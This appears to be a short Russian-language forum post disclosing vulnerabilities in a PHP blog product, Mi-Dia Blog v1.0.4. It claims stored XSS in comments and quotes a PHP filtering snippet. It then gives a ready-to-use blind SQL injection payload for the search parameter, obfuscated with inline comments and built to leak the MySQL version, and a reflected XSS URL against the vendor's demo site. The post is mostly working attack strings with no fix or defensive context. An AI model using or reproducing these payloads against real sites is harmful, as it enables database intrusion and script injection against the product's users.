Название: Mi-Dia Blog Автор: Christopher Shaw Адресс оффициальной странички: http://www.mi-dia.co.uk/ Активная XSS. В комментариях к записям блога. SQL Иньекция Кода много, приведу тока фильтрациб. PHP: $v = htmlspecialchars($_GET['v']); $d = htmlspecialchars($_GET['d']);
product : Mi-Dia Blog v1.0.4 Blind SQL search ---> mq=off mysql = 5 Code: xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
еще пассивная xss Code: http://demo.mi-dia.co.uk/?s=search&tags=%3Cscript%3Ealert(/xss/)%3C/script%3E
